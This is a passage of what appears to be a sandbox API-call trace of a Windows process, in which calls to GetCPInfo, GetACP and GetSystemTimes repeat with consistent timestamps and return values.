GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.486] GetACP () returned 0x4e4 [0043.486] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.487] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.487] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.488] GetACP () returned 0x4e4 [0043.488] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.489] GetACP () returned 0x4e4 [0043.489] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.490] GetACP () returned 0x4e4 [0043.490] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.491] GetACP () returned 0x4e4 [0043.491] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.492] GetACP () returned 0x4e4 [0043.492] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.493] GetACP () returned 0x4e4 [0043.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.494] GetACP () returned 0x4e4 [0043.494] GetSystemTimes (in: 